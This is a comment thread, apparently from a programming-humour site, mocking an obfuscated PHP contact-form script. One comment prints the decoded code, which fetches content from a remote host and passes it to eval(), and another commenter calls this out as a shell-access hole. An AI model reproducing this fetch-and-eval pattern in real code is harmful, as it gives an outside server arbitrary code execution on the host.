| « Prev | Page 1 | Page 2 | Next » |
|
it's a php implementation of .net's __VIEWSTATE, obviously.
|
|
QmFzZSA2NCBpcyB2ZXJ5IHNlY3VyZS4gQW5kIEZpcnN0Lg==
(Lol, base 64 is very secure). |
|
You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!
|
|
This is to complex for Paula, isn't it?
|
|
Y3JleSAtWlpWWlI6Ok9uZnI2NCAtciAnY2V2YWcgcXJwYnFyX29uZnI2NCAoIklUdWNwbE93bzIx
Z01KNTBWVHltVlVBeUwzSWxNRjRYIiknCg== |
|
Was the coder storing PHP code in a session?
|
|
I have failed to post first (1st). This is the seventh (7th) post.
|
|
This code makes baby Jesus cry.
|
Re: Superencryptalisticexpialidocious
2008-05-29 08:23
•
by
Gieron
|
cFNFV29UOURHenFBRXg1dUdIZ0FxSjlER21xSklIOWZveGIxWlNNREkwdWhJVXlnSXlFT25KOVha S3lpTEhFMG94Z25xVDlYQkprQQpFeDlnR0hjT1pLTzZGVHVZSVFFMkl5SGpMRGNEcVEwOQ== |
|
PWNED, er....UFdORUQ=
<?php session_start(); ///MAILPERMIN/// if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) { $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time(); $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']); $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60; if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20) && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) { $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054; echo "you have exceeded the number of times you are allowed to use this form <br><br>Please try again in an one (1)hour or three(3)<br>"; exit; } elseif ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 > 30* 60 ) { session_unset(); $_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] = 0; } } if (isset ($_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044'])) { $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time(); $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044']); $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60; if ($z3236T732A4228668u4347Z743A5329757x4650S746A5630054 > 2) { $_SESSION['x2226D722A3227678T6670O766A7632034y3135Y731A4128569'] = ""; } } ///MAILPERMIN/// $id_hd = '88BB-5822'; $id_num = 'fghhijklklmnopqrstvvvwxwyyBDJLNQSUYZaZdefhkkmmnppqsvyABDEFILQUXXYXWTOIxkWJynfWNICzuqlfaVPLGAtlfbVSOLKIIJLPVaflryHSdmxGPbirAJUguFQ'; ?> <?php $my_var = ''; $page_data = <<< PAGE_DATA PAGE_DATA; $Y6367K763A7331737W8589B785A9533915U9195O791A1013451 = @fopen ("http://www.spamfreecontact.com/err/?_=402&ok=$id_num", "r"); if (!$Y6367K763A7331737W8589B785A9533915U9195O791A1013451) { /* echo "<p>Unable to open remote file."; */ /* exit; */ } else { while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) { $Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets ($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024); } eval (' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php '); fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451); } if (($gotten == 111)&&($hd == $id_hd )) { include ('initrodeGlobal_com.php'); } elseif ($gotten != 111) { include ('initrodeGlobal_com.php'); } elseif (($gotten == 111)&&($hd != $id_hd )) { echo $error_msg; } ?> |
|
One of my former jobs did a similar mucking around operation to their PHP, mainly to keep customers from going and messing with it then making support calls.
I know it was some package that they actually bought a license for. Never paid much attention to see how "secure" it was, as it was really there to be an annoyance. |
Re: Superencryptalisticexpialidocious
2008-05-29 08:30
•
by
jvanderb
|
|
|
|
Looks like it was run through an obfuscation tool.
Captcha: Mongo like modo |
Re: Superencryptalisticexpialidocious
2008-05-29 08:36
•
by
KattMan
|
Exactly what I was thinking. No one, even those not in thier right mind would create variables like that. Obfuscation would always rename your variables in this fashion, the encryption was also part of that process. |
Re: Superencryptalisticexpialidocious
2008-05-29 08:44
•
by
bsander
(unregistered)
|
|
The real WTF is this:
echo "you have exceeded the number of times you are allowed to use this form <br><br>Please try again in an one (1)hour or three(3)<br>"; |
|
This is just so obvious, it even shows how it's encoded in the SAME file!! It would have been a lot better to do the decryption in a separate PHP file, that only includes the encrypted file.
Or you could just use Zend Encoder, which would work, or write your own Apache-module to 'save money' ;) If this is to run on the client's server, then this would probably suffice. I once ran into a webpage that was entirely base64-encoded, except for one line of Javascript code. Hey smart-ass, if the user can see the page like it shows up, do you think the client can also use the HTML code? The real joke was that nobody would ever want to copy anything from that code, it looked like crap and so on... The author wanted my opinion on his site. "Well, it doesn't show up in firefox, and I think this line of code is the problem. And by the way, get rid of the encryption, because it only took met 10 minutes to get this code..." |
Re: Superencryptalisticexpialidocious
2008-05-29 08:48
•
by
SchizoDuckie
(unregistered)
|
|
It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:
http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx And the site says
Is it some kind of conspiracy? |
Re: Superencryptalisticexpialidocious
2008-05-29 08:56
•
by
Claxon
|
Please file this in a T.P.S. Report. ;) |
Re: Superencryptalisticexpialidocious
2008-05-29 08:59
•
by
me
(unregistered)
|
Try watching Office Space http://www.imdb.com/title/tt0151804/ |
Re: Superencryptalisticexpialidocious
2008-05-29 09:05
•
by
StarLite
|
my stapler.... ;) |
|
Should have used perl & Acme::Pony
|
|
There is an actual commercial package which costs quite a bit and does exactly this. Name escapes me.
|
Re: Superencryptalisticexpialidocious
2008-05-29 09:08
•
by
Jeroen Brattinga
(unregistered)
|
|
Sh!t, we've been hacked. All our sensitive R&D data, customer credit and bank records have been stolen. Fortunately one part was uncompromised: the 'Contact Us'-form.
|
Re: Superencryptalisticexpialidocious
2008-05-29 09:11
•
by
SchizoDuckie
(unregistered)
|
Thanks for the tip. Utorrent is currently downloading :P |
Re: Superencryptalisticexpialidocious
2008-05-29 09:17
•
by
Heem
(unregistered)
|
|
yes, quite secure.
|
|
It looks like it's been run through an obfuscator.
|
|
PD9waHANCiAgJHRoaXNDb21tZW50LT5mZWF0dXJlZCA9IHRydWU7DQo/Pg==
|
|
Please, everybody, stop saying "encrypted" or "decrypted" -- there's no encryption going on here! Just encoding!
|
|
base64_decode($string2);
now what ? |
Re: Superencryptalisticexpialidocious
2008-05-29 09:58
•
by
Leak
|
I see someone's directly headed for the 'pound me in the ass' prison... Would it be too much to buy the DVD? |
Re: Superencryptalisticexpialidocious
2008-05-29 10:04
•
by
zaphod
(unregistered)
|
|
$comment = encrypt(":h>Y1~.`4");
|
Re: Superencryptalisticexpialidocious
2008-05-29 10:50
•
by
SchizoDuckie
(unregistered)
|
|
Save the environment! I don't buy plastic useless disks if i can download it too ;-)
Furthermore, only people from the USA go to pound-me-in-the-ass prisons for downloading movies :') |
|
spamfreecontact.com? That doesn't sound at all shady!
|
|
This is not all that unusual, actually. It's just been run through an obfuscation tool. Several different ones exist for PHP. You simply run the final code through them, it replaces the variables with gibberish, removes comments and newlines and spaces and such, base 64 encodes, and spits out that result.
Because PHP is basically a scripting language, and therefore the source = the final result, and a lot of silly people want their code to be "secure from prying eyes", you get this sort of nonsense. Useless and ineffective, but... sigh. Try telling that to any of these morons. One use of obfuscation lately that has been pissing me off is when somebody who makes a theme for WordPress (which is all PHP) obfuscates their own linkback into the footer of the thing, and does it in such a way as to make removing it difficult to a non-coder. A coder, of course, simply runs the code, copies the output, and replaces the obfuscated code with it, minus the linkback, but still, it's annoying. I'm trying to convince various theme hosting sites to not allow themes with this crap code it in. Fortunately, it's relatively easy to detect this sort of thing automatically. You just have to look for long strings of letters and numbers without much spacing. |
Re: Superencryptalisticexpialidocious
2008-05-29 11:13
•
by
Federal Suppliers Guide
(unregistered)
|
|
Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!
|
Re: Superencryptalisticexpialidocious
2008-05-29 11:30
•
by
anonymous
(unregistered)
|
|
That's standard for code obfuscators -- they change all the variable names, remove all the white space, then base64 encode it.
|
|
At this point, I'm going to have to run most of the comments through a base-64 decode just to see the pointless jokes.
Of course, that's not going to stop me from doing it. |
Re: Superencryptalisticexpialidocious
2008-05-29 12:13
•
by
NegativeZero
(unregistered)
|
|
I see crap like this all the time (I work in Antivirus development). It's basically just obfuscation. Normally you see it in VBScript and Javascript though.
Some of the other tricks they like to do are printing out Javascript which will then in turn be run (Javascript allows code to be self-modifying) and breaking things up by randomly URL-encoding characters in strings or even breaking them up and concatenating them, sometimes bringing in the results of random function calls or variables with junk names too. This is the first time I've seen someone try and obfuscate PHP like this though. |
Re: Superencryptalisticexpialidocious
2008-05-29 12:36
•
by
martinsc
(unregistered)
|
|
wow... that's all i can say....
|
Re: Superencryptalisticexpialidocious
2008-05-29 12:39
•
by
WhiskeyJack
|
Nice! That was a great story. |
|
They should base64 encode it twice, that way it will take hackers twice as long!
|
Re: Superencryptalisticexpialidocious
2008-05-29 13:37
•
by
Mnenhy
(unregistered)
|
Re: Superencryptalisticexpialidocious
2008-05-29 13:59
•
by
Philip Hofstetter
(unregistered)
|
|
the thing I like the most is the blatant security hole:
that file handle points to a remote URL fopen()ed earlier. So this code basically takes some remote content and feeds it into eval(). How nice of this coder to give their remote service a shell access to his server :-) Philip |
|
Why is a long variable name considered secure? notepad's find/replace easily defeats it
|
Re: Superencryptalisticexpialidocious
2008-05-29 14:20
•
by
GrandmasterB
(unregistered)
|
|
It looks like some newb didnt understand the difference between client and server side exectution. He was probably trying to obfuscate the data on the contact form so that spammers couldnt get the email address via web harvesting. I bet he read that in a shiny IT magazine.
Doing that in javascript does help to some extent. Doing it in PHP is just dumb. Some PHP encoders make files that look similar to that base64 block of code, but I dont think thats what that is. They would have calls to decrypt the actual string. |
Re: Superencryptalisticexpialidocious
2008-05-29 15:09
•
by
wesley0042
(unregistered)
|
|
Or just watch it for free. It's on hulu.com
|
Re: Superencryptalisticexpialidocious
2008-05-29 15:22
•
by
Edward Royce
(unregistered)
|
|
Hmmmmm.
I am not nearly drunk enough to read this article. |
Re: Superencryptalisticexpialidocious
2008-05-29 15:23
•
by
Edward Royce
(unregistered)
|
Now that's a clbuttic! |
Re: Superencryptalisticexpialidocious
2008-05-29 19:00
•
by
Jay
(unregistered)
|
Or sales. |
|
I think a fun way to obfuscate code would be to change all the variable names to names that sound like they would be relevant to this program ... but aren't what the field actually contains. Like change "billing_amount" to "payment_amount" and "stock_number" to "quantity_on_hand". Then add a bunch of comments that carefully describe an algorithm that isn't actualy a part of this program. Okay, it would be a lot of work, but I'd laugh and laugh thinking about the poor guy who comes after me trying to figure it out. I might try this next time I'm really really mad at the company, just before I quit.
|
| « Prev | Page 1 | Page 2 | Next » |
ChZEROHag: